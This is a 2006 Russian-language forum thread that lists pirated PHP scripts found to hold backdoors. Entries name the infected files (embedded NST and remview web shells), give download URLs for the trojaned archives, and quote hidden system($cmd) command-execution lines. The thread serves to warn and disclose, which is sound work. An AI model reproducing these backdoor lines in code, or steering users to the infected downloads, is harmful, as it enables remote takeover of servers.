PDA

Просмотр полной версии : Затрояненные скрипты.


k1b0rg
15.10.2006, 20:07
Выкладываем сюда, все скрипты в которые встроенны черные ходы, шеллы, маячки и т.д.
В формате:

1) Название скрипта
2) Файлы которые заражены.
3) Сайт откуда был скачен скрипт.

k1b0rg
15.10.2006, 20:10
1) Vbulletin 3.6.1 занулен SCRiPTMAFiA
2) includes/class_dm_announcement.php Встроен nst шелл.
3) http://s3m.ru/files/VBulletinv361_PHP_NULL.zip

k1b0rg
15.10.2006, 20:12
1) PHPrpg
2) leap.php весь файл это php remview шелл
3) http://rapidshare.de/files/25349919/phprpg.rar

k1b0rg
15.10.2006, 20:19
1) Strike Project
2) leap.php весь файл это php remview шелл
3) http://rapidshare.de/files/25350055/strikerpg.rar

Как и предыдущий скрипт, выложены в скрипт-паке он-лайн игр

k1b0rg
16.10.2006, 00:35
1) AlstraSoft.Template.Seller.Pro v3.21.PHP.NULL-WDYL
2) include/adodb/adodb-connetcion.inc.php содержит строки ADOConnection::outp( "CacheFlush: $cmd<br><pre>\n", system($cmd),"</pre>");
3) Был взят из какого-то cms пака.


1) Netcat standart 2.3
2) netcat/admin/dump.inc.php содержит код system($cmd);
3) скачан из cms пака от monsterteam.info

bul.666
16.10.2006, 00:40
Извиняюсь, конечно за оффтоп, но нельзя ли бы указывать полную инфу...
Например:
1) Vbulletin 3.6.1
2) includes/class_dm_announcement.php Встроен nst шелл.
3) http://s3m.ru/files/VBulletinv361_PHP_NULL.zip
ТОльео название скрипта, а кем занулена версия?